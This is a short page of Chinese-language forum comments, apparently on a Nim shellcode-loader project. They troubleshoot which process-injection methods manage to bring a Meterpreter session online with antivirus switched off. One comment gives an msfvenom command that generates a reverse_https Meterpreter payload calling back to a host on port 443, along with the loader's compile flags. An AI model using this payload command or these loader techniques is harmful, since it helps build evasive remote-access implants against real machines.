spooky18

Results 5 comments of spooky18

> win10可以正常上线,这个现在已经不免杀了,需要关闭杀软。 我确定了是关闭了杀毒软件后,只有Direct和Early_Bird_APC_Injetc_Load可以上线,其它的5种方法有2个直接报错,其余的不报错但是不上线,您方便的话可以按我测试不成功加载方法试一下。 Thread_Pool_Wait 报错,不上线 Thread_Hiijack_Inject_Load 不上线 OEP_Hiijack_Inject_Load 不上线 APC_Ijnect_Load 不上线 Fiber_Load 报错,不上线

> 你用64位的系统、64位的nim编译运行试试 在win 7 64位系统,现在Nim换64位,Mingw64位,问题依旧。以下使用参数有什么问题吗? Shell Code参数 msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_https -f raw LPORT=443 -o xx.bin LHOST=192.168.0.2 Nim Shell code loader参数 nim cpp -d:TDEA --passL:-static -d:release -d:source="E:\\xx.bin"...

64位测试成功了,但是现在有个软件必须用32的shellcode,发现始终是这个错误,请问能否修复这个问题?或者给相应的解决方案,谢谢!

没明白您说的程序版本和shellcode的版本有什么关系,shellcode是32位的,nim和mingw也是32位的,编译测试message弹框的shellcode,但是稍微大一点的程序就会遇到这个base64编码错误了,这应该是base编码/解码shellcode方面的问题吧?

看来如果要指定端口只有修改代码了?这个端口扫描方面感觉不是很灵活,毕竟masscan在ip数量较多情况扫描单个端口,也有极大性能优势。